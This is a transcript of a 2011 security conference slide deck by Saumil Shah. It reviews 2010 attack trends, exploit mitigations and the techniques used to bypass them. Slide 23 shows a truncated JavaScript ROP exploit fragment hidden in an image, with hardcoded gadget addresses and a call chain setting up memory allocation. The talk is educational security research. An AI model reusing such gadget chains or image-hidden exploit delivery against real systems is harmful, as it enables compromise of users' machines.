nullcon 2011 - Lessons learned from 2010

Lessons learned from 2010 by Saumil Shah

Published in: Technology

Transcript of "nullcon 2011 - Lessons learned from 2010"

  1. 2010: A Net Odyssey. Saumil Shah, nullCON Goa, 26.02.2011. net-square | n|u dwitiya
  2. Welcome to NullCON! nullcon.net | null.co.in
  3. # who am i: Saumil Shah, CEO Net-Square, saumilshah, Hacker
  4. What did we learn from ?
  5. (no text)
  6. Attack Surface
  7. ATTACK SURFACE 2010-2011
  8. Wider Attack Surface
  9. Ease of Exploitation
  10. Mass Manufacturing: World wide coverage. Hides your tracks.
  11. Complexity... as never seen before!
  12. A New Dimension! GUARANTEED!! Fresh new bugs, present on most computers
  13. "The amount of intelligence in the world is constant. And the population is increasing." Browser Wars, Death of Standards, HTTP +0.1, Reckless Plugins
  14. Exploit Mitigation Techniques
  15. /GS, SafeSEH, DEP, ASLR, Permanent DEP, ASLR and DEP
  16. /GS vs. SEH overwrites; SafeSEH vs. non-SEH DLLs; DEP vs. Return to LibC; ASLR vs. Heap Sprays; Permanent DEP vs. ROP; ASLR and DEP vs. JIT Sprays
  17. It's SPLOIT TIME!
  18. Jedi A/V Tricks: These are not the sploitz you're looking for.
  19. Obfuscated Javascript decoded without using eval, document.write, etc. See no eval! Acrobat CoolType exploit, IE+JNLP exploit
  20. High Tech vs. Low Tech. High Tech: Acrobat CoolType exploit, Return Oriented Programming code. Low Tech: Escape-From-PDF, No fancy tricks.
  21. This iz what ?
  22. I'm an evil Javascript. I'm an innocent image.
  23. (JavaScript shown inside a CANVAS element; the listing on the slide ends at retval="")
      function packv(n){var s=new Number(n).toString(16);while(s.length<8)s="0"+s;return(unescape("%u"+s.substring(4,8)+"%u"+s.substring(0,4)))}
      var addressof=new Array();
      addressof["ropnop"]=0x6d81bdf0;
      addressof["xchg_eax_esp_ret"]=0x6d81bdef;
      addressof["pop_eax_ret"]=0x6d906744;
      addressof["pop_ecx_ret"]=0x6d81cd57;
      addressof["mov_peax_ecx_ret"]=0x6d979720;
      addressof["mov_eax_pecx_ret"]=0x6d8d7be0;
      addressof["mov_pecx_eax_ret"]=0x6d8eee01;
      addressof["inc_eax_ret"]=0x6d838f54;
      addressof["add_eax_4_ret"]=0x00000000;
      addressof["call_peax_ret"]=0x6d8aec31;
      addressof["add_esp_24_ret"]=0x00000000;
      addressof["popad_ret"]=0x6d82a8a1;
      addressof["call_peax"]=0x6d802597;
      function call_ntallocatevirtualmemory(baseptr,size,callnum){var ropnop=packv(addressof["ropnop"]);var pop_eax_ret=packv(addressof["pop_eax_ret"]);var pop_ecx_ret=packv(addressof["pop_ecx_ret"]);var mov_peax_ecx_ret=packv(addressof["mov_peax_ecx_ret"]);var mov_eax_pecx_ret=packv(addressof["mov_eax_pecx_ret"]);var mov_pecx_eax_ret=packv(addressof["mov_pecx_eax_ret"]);var call_peax_ret=packv(addressof["call_peax_ret"]);var add_esp_24_ret=packv(addressof["add_esp_24_ret"]);var popad_ret=packv(addressof["popad_ret"]);var retval=""
      <CANVAS>
  24. Server Side Vulnerabilities
  25. SQL injection, XSS, CSRF, RFI/LFI, Input tampering
  26. Who broke the Web? HTML: Old and idiotic, Object SRC=, JS too powerful. HTTP: Stateless, No Auth, Bursty access. Standards... What Standards?
  27. W3C: "I don't think it's ready for production yet," especially since W3C still will make some changes on APIs, said Le Hegaret. "The real problem is can we make HTML5 work across browsers and at the moment, that is not the case." [6th October 2010]
  28. Application: Delivery, Authentication, Statefulness, Data Typing, Non-mutable
  29. The Web Application at present: Delivery: HTTP; AJAX; Authentication: HTML; Flash; Statefulness; Sandbox; Data Typing; HTML5; Non-mutable; Anti-XSS; WAF; Silverlight; Web sockets
  30. The FUTURE is HERE!
  31. No longer Science Fiction: DEP bypassing, Man in the Browser, ROP code, Malware, Political Cyber warfare
  32. The Solution?
  33. Keep on patching!
  34. I can haz sandbox. I Also Can!
  35. The Solution? HTML 8.0, HTTP 2.0, Browser Security Model, Self Contained Apps
  36. kthxbai. saumil@net-square.com, slideshare.net/saumilshah, www.net-square.com